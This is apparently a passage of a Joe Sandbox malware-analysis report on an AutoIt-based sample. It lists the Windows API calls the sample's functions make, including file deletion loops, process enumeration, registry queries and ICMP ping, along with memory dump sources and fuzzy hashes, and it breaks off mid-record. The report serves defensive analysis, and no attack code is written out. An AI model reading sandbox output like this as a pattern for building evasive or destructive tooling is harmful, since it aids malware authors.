                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E8DD1B
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E8DD2C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8DD43
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8DD4C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: cc26b1964e9b4179529749da2d905517bad07380131069874b36e4a53cd7e157
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7000900b0a9eac8cfabc7cd16ad15b565dde7b282ede7701e802e818b548e899
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc26b1964e9b4179529749da2d905517bad07380131069874b36e4a53cd7e157
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA31393104C395AFC205FB60DD859AFB7E8AE95304F406A5DF4D9A21A1EB21DA09CB62
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00E8DDAC
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00E8DDBA
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00E8DDDA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E8DE87
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 901df911ef48bce18c5ab5f50bc81c88d88f9f7f0d26326f7d670708e9bdbe7d
                                                                                                                                                                                                                                                                                                    • Instruction ID: e6cc33c17dc516ee714636258408aec3822f1b3d05edb927cad0327529f837ea
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901df911ef48bce18c5ab5f50bc81c88d88f9f7f0d26326f7d670708e9bdbe7d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD31A2711083019FD300EF54DC85AAFBBE8AF99354F04192DF589A71A1EB71A949CB92

                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: 4$@$P$`*$`$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$t$t$($($($(
                                                                                                                                                                                                                                                                                                    • API String ID: 0-2951036942
                                                                                                                                                                                                                                                                                                    • Opcode ID: e8909c334c86c75ca39df752ace8dc041ba07f55e69f26fa80714e694b8b588d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 29475239520bfc9de17696263761ee9feb4715b232e1d66154acfbbb66ce3ba8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8909c334c86c75ca39df752ace8dc041ba07f55e69f26fa80714e694b8b588d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B6258705093419FC728DF14C589AAABBE1FFD8308F10996EE58AAB351DB70D945CF82

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00E23657
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00E23681
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E23692
                                                                                                                                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00E236AF
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E236BF
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00E236D5
                                                                                                                                                                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E236E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: +$0$0+m"$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 2914291525-2301606172
                                                                                                                                                                                                                                                                                                    • Opcode ID: ff81bd792d6cf386ff103372741ac8154315e62eb9b758f69d9c1e47eb7bdf50
                                                                                                                                                                                                                                                                                                    • Instruction ID: f9c5f9442c4b82e0949e6fa158cc400e29308d9693ad1124abb6512716160260
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff81bd792d6cf386ff103372741ac8154315e62eb9b758f69d9c1e47eb7bdf50
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7421B7B5905219AFDB009F95EC89AEEBBB4FB48710F10521AF611B62A0E7B54548CF90

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E23709,?,?), ref: 00E23777
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00E23709,?,?), ref: 00E237A3
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E237C6
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E23709,?,?), ref: 00E237D1
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00E237E5
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00E23806
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                    • String ID: 0$$0$$TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 129472671-3836791346
                                                                                                                                                                                                                                                                                                    • Opcode ID: 48dceea2360eeb283eac88d17b442eeaaea7eb99cd539bfb4d505318377f8c90
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5775ad636369191fcf2be1221571eb1b3d6590d0c11fd501ab89966d0273d6f5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48dceea2360eeb283eac88d17b442eeaaea7eb99cd539bfb4d505318377f8c90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4441FBF12442657EDF141B38FC49BBB3BA5E780304F10222BF602B6190DBB99B48DE61

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E6071A: CreateFileW.KERNEL32(00000000,00000000,?,00E60A84,?,?,00000000,?,00E60A84,00000000,0000000C), ref: 00E60737
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E60AEF
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E60AF6
                                                                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00E60B02
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E60B0C
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E60B15
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E60B35
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E60C7F
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E60CB1
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E60CB8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7f29d1bda45fa014046536bf05bc14f383cdb5fdca25f26a7f516caaf8f02f92
                                                                                                                                                                                                                                                                                                    • Instruction ID: 24517142ce201c981262f831be4a176a7306fd182392659e2e51b7166a762d2a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f29d1bda45fa014046536bf05bc14f383cdb5fdca25f26a7f516caaf8f02f92
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67A12432A541188FCF19AF68E852BAE7BE1EF06364F141199F811FB392DB319D06CB51

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E255B2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2525A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E253C4
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E64BFD
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E64C3E
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00E64C80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E64CE7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E64CF6
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                                    • Opcode ID: a089dccd2230d21f40af059ce3ae833bd055ff9a2d639de68280de082ff6f380
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd3c89018b0d44c927ece3c3dcce0638ebba187bcc340fb27715d0c2a7480624
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a089dccd2230d21f40af059ce3ae833bd055ff9a2d639de68280de082ff6f380
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05719FB15453019EC304EF76EC819ABBBE8FF98340F40252EF551B72A0EB719A49CB91

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00E234DE
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E234ED
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00E23503
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00E23515
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00E23527
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E2353F
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00E23590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: GetSysColorBrush.USER32(0000000F), ref: 00E23657
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: RegisterClassExW.USER32(00000030), ref: 00E23681
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E23692
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: InitCommonControlsEx.COMCTL32(?), ref: 00E236AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E236BF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: LoadIconW.USER32(000000A9), ref: 00E236D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E236E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                    • Opcode ID: 00ead6cc48ad410f17bf4e4f67148071b4d40a1203f31a0be58e699ae4836dc4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 84daa29062ac472e3da73830ad0f4bdb42c5251aeea96281e169b521057099b1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00ead6cc48ad410f17bf4e4f67148071b4d40a1203f31a0be58e699ae4836dc4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04212FB4D01316AFDB109FA6EC55AAA7FB4FB88750F00405EE708B62A0D7B9454DCF90

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 00EA1019
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 00EA1079
                                                                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 00EA1085
                                                                                                                                                                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00EA1093
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA1123
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA1142
                                                                                                                                                                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00EA1216
                                                                                                                                                                                                                                                                                                    • WSACleanup.WSOCK32 ref: 00EA121C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: Ping
                                                                                                                                                                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                    • Opcode ID: 241cb5b5c33962274a6c6daabccdefbcd00718e38a0d4e5bf53724410ada81ba
                                                                                                                                                                                                                                                                                                    • Instruction ID: ec7bf76b5c5db7d459162f8b9d7c79d65c710df95d2ef217cb922160311e2560
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 241cb5b5c33962274a6c6daabccdefbcd00718e38a0d4e5bf53724410ada81ba
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B91AE316092419FD720DF29C888F16BBE0AF49318F1495A9F569AF7A2C730FD85CB91
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
                                                                                                                                                                                                                                                                                                    • API String ID: 0-3061639177
                                                                                                                                                                                                                                                                                                    • Opcode ID: 59ad757bb878f4945c00c1415d327f8ff18fd414cf9efac6365f10bfa100c375
                                                                                                                                                                                                                                                                                                    • Instruction ID: 644b8223404b296b4fe468c94222fa761fa12157633360b65b374308d438ef6a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59ad757bb878f4945c00c1415d327f8ff18fd414cf9efac6365f10bfa100c375
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09C27B71A00225DFDB24CF68E890AADB7F1BF48314F24917AE949BB391D771AD41CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E315F2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: t5$t5$t5$t5$t5
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-3253990334
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7f6041be03a2767459fd88e0c2c5c0ff07c17b51fd48c8b60a2f6651c394d4d9
                                                                                                                                                                                                                                                                                                    • Instruction ID: e44e0f4b62887bde275b1cc058797524ab8c5746851d8fdaa374fbc4e5679f81
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f6041be03a2767459fd88e0c2c5c0ff07c17b51fd48c8b60a2f6651c394d4d9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B2BC74A08301CFDB24CF18C494A6ABBF1BF89308F14A95DE999AB351D771ED44CB92

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E232AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E232B7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E232C2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E232CD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E232D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E232DD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23205: RegisterWindowMessageW.USER32(00000004,?,00E22964), ref: 00E2325D
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E22A0A
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32 ref: 00E22A28
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00E63A0D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                    • String ID: (&$0$$4'$d($$
                                                                                                                                                                                                                                                                                                    • API String ID: 1986988660-3144845333
                                                                                                                                                                                                                                                                                                    • Opcode ID: faa8f1475f273a515024be947c48e497f2014b2e3195e8d75cdf2d2e47a36085
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8b4b68b4f173b040e20e84ffba855f051aec95e7b84f8ff1ff30e6a8955b4202
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faa8f1475f273a515024be947c48e497f2014b2e3195e8d75cdf2d2e47a36085
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4671AEB09062418F8788EF7BAD666753BE0BBC8344740A12ED318F72B1EBB04549DF56

                                                                                                                                                                                                                                                                                                    Control-flow Graph

Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ebcb9fea7ce739741143ef1ea187afa24ac43c47a3d95d33c65e4a5b861c0ac
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1084edf7f4a136ba746db36a996124ba934c04c45622dba28486c9e955f9556
